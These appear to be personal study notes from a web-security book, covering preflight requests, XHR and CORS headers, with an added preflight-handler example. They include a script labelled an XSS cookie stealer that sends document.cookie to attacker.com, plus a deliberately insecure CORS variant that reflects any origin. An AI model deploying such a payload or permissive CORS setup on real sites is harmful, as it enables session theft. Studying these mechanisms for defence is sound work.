This is just my understanding of what I read throughout the book. It may not be perfect information, and I advise you to do your own research on anything that is not properly understood or seems "off".
A preflight request is a small request that the browser sends before the actual request (most commonly seen with the XHR object). It tells the server which HTTP method the real request will use and whether any custom HTTP headers will be present.
The XMLHttpRequest object allows asynchronous background web requests and also non-GET methods (such as POST requests). This can of course be very handy when making certain silent web hacking payloads, such as an XSS silent cookie stealer.
<script> var xhr = new XMLHttpRequest(); var url_to_use = "http://attacker.com/cookies=" + document.cookie; xhr.open('GET', url_to_use, true); xhr.send(); </script>
CORS (Cross Origin Resource Sharing)
Web developers feel the need to push the boundaries of certain browser capabilities, to allow the webapps to come as close as possible to a "native" application through the browser.
One of those boundaries is the Same Origin Policy, which was also one of the few security mechanisms implemented in the first browsers. Developers often have legitimate reasons for wanting to relax the Same Origin Policy, for example when they want to spread a site across multiple domains or simply make interactions between unrelated domains possible.
Browser request CORS headers (3)
Header: What does it do?
Origin: The scheme/host/port of the resource making the initial request. Sharing with this origin has to be granted by the server. The whole point of this header is to ensure the request is coming from an uncompromised browser: the value is set by the browser itself and can not be modified by HTML, JS or plugins.
Access-Control-Request-Method: Used in preflight requests to find out whether or not the server will allow the method that XHR wants to use.
Access-Control-Request-Headers: Also used in preflight requests to find out whether the server will allow any additional headers that XHR wants to use.
Server response CORS headers (6)
Sharing resources cross-origin has to be allowed by the server, and access to responses from the server is always restricted by the Same Origin Policy unless the response specifies otherwise with one or more CORS headers. These headers are known as Access-Control-* headers and are returned in the server's response. The client's browser also sends certain headers to facilitate security. Furthermore, a browser may use a preflight request in certain situations to establish the CORS policy; this is generally the case for the XHR object.
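To make the preflight exchange above concrete, here is an added example (my own illustration, not code from the book) of the server-side decision a preflight handler makes: it reads the browser's Origin, Access-Control-Request-Method and Access-Control-Request-Headers, checks them against a hypothetical allowlist, and either returns the Access-Control-* response headers or refuses. The allowlist values, function names and the sample request are all constructed for the example.

```javascript
// Hypothetical allowlist for this example (not from the book).
const ALLOWED_ORIGINS = new Set(['https://app.example', 'https://admin.example']);
const ALLOWED_METHODS = new Set(['GET', 'POST']);
const ALLOWED_HEADERS = new Set(['content-type', 'x-csrf-token']);

// Answers a preflight (OPTIONS) request. Returns the Access-Control-* headers the
// server should send, or null when the preflight must be refused. Refusing means
// sending no CORS headers at all, so the browser blocks the real request.
function answerPreflight(req) {
  const origin = req.headers['origin'];
  // The browser sets Origin itself; the server still has to decide whether to trust it.
  if (!origin || !ALLOWED_ORIGINS.has(origin)) return null;
  const method = (req.headers['access-control-request-method'] || '').toUpperCase();
  if (!ALLOWED_METHODS.has(method)) return null;
  // Header names are case-insensitive, so compare them lower-cased.
  const wanted = (req.headers['access-control-request-headers'] || '')
    .split(',').map(h => h.trim().toLowerCase()).filter(Boolean);
  if (!wanted.every(h => ALLOWED_HEADERS.has(h))) return null;
  return {
    'Access-Control-Allow-Origin': origin,          // echo only an allowlisted origin, never '*'
    'Access-Control-Allow-Methods': [...ALLOWED_METHODS].join(', '),
    'Access-Control-Allow-Headers': wanted.join(', '),
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',                               // caches must key the answer on Origin
    'Access-Control-Max-Age': '600',                // browser may cache the preflight result
  };
}

// Weak variant, shown for contrast: reflecting any Origin together with
// Allow-Credentials lets every site read authenticated responses.
function answerPreflightInsecure(req) {
  return {
    'Access-Control-Allow-Origin': req.headers['origin'] || '*',
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Constructed sample preflight, as a browser would emit it before an XHR POST
// that carries a custom header.
const samplePreflight = { method: 'OPTIONS', headers: {
  'origin': 'https://app.example',
  'access-control-request-method': 'POST',
  'access-control-request-headers': 'X-CSRF-Token, Content-Type',
} };

console.log(answerPreflight(samplePreflight));
```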